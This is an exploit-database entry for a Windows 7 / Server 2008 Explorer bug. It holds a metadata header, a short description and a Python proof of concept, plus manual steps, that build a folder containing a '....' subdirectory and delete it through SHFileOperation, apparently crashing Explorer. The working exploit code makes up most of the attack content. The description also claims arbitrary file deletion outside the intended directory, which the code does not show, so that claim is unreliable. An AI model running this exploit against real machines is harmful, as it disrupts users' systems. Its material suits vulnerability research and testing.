Windows 2008 SP2 RC2 & Windows 7 Pro SP1 Explorer Go Byebye :P

vendor:

Windows 7

by:

Level & z0r0

8,8

CVSS

HIGH

Directory Traversal

22 (Path Traversal)

CWE

Product Name: Windows 7

Affected Version From: Windows 2008 SP2 RC2

Affected Version To: Windows 7 Pro SP1

Patch Exists: NO

Related CWE: N/A

CPE: o:microsoft:windows_7::sp1:professional

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2020

Windows 2008 SP2 RC2 & Windows 7 Pro SP1 Explorer Go Byebye :P

This exploit is a directory traversal vulnerability in Windows 2008 SP2 RC2 and Windows 7 Pro SP1. It allows an attacker to delete files and directories outside of the intended directory. The exploit is triggered by creating a directory named 'trigger_alt' and a subdirectory named '....' in the root directory. Then, the attacker can use the SHFileOperation function to delete the directory and its contents.

Mitigation:

Ensure that user input is properly sanitized and validated to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
	mkdir("c:\\trigger_alt")
except:
	print "[!] Trigger Directory Exists"
try:
	mkdir("c:\\trigger_alt\\....")
except:
	print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete 

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))